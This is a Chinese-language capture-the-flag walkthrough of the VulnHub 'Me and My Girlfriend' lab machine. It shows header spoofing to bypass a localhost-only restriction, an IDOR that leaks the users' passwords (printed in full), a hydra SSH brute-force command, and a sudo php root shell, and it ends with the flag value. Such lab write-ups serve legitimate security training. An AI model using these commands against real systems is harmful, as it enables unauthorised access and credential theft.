1. 程式人生 > 其它 >8.me and my girlfriend

8.me and my girlfriend

me and my girlfriend

一個不錯的練手靶機

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

靶機 : me and my girlfriend

滲透機 : kali + win10

補充 : 如果靶機自帶的是nat網路 , 如果需要更改 , 別忘記啦 , 我忘記是什麼啦

目標: 拿到flag1.txt flag2.txt

0x01. 資訊收集

1. 確定靶機ip

掃描當前網段ip

kali 192.168.0.105 靶機 192.168.0.110

2. 掃描全埠

rustscan -a 192.168.0.110 -r 1-65535 -- -sV
這裡用的是rustscan掃描的 , 當然你也可以用nmap

既然開放了 22 80 , 那麼訪問一下80埠 , 發現只允許本地訪問 , 那麼我們就簡單的繞一下

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
不知道是哪個頭獲取的ip , 索性全加上吧

這樣就有許可權訪問了 , 接下來就是簡單的註冊一個登入試一試

0x02. 漏洞探測

1. 漏洞驗證

通過你多年的滲透經驗 , 發現了一個uid引數 , 很有可能存在越權漏洞 , fuzz一下試試

細節 , 0-12

果然存在越權漏洞 , 獲取到存在的賬號和密碼

user
alice                         
sundatea                 
aingmaung             
abdikasepak           
eweuhtandingan     
sedihaingmah 

passwd
4lic3
indONEsia
qwerty!!!
dorrrrr
skuyatuh
cedihhihihi

之前掃描出來一個22埠 , 嘗試用這些賬號和密碼爆破一下

hydra -L ./user.txt -P ./passwd.txt -vV -f 192.168.0.110 ssh

最後爆出賬密

alice       4lic3

然後就是ssh登入

2. 拿到shell

ssh [email protected]

然後通過檢視家目錄的隱藏檔案 , 找到一個我的祕密資料夾

根據提示 , 接下來就是提權進到root下找到最後的flag啦

0x03. 提權

1. 主機資訊收集

提權的本質也就是根據主機的漏洞 , 進行許可權提升 , 所以還是要資訊收集的

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

或者用這個提權輔助工具
https://github.com/mzet-/linux-exploit-suggester.git
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

上傳Linux資訊收集指令碼發現一個sudoers提權方法 , 但是靶機無法呼叫gcc編譯 , 所以看看有沒有其他方法

2. php提權

sudo -l

https://gtfobins.github.io/gtfobins/php/#suid

sudo php -r "system('/bin/bash');"

順利拿到第二個flag

Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}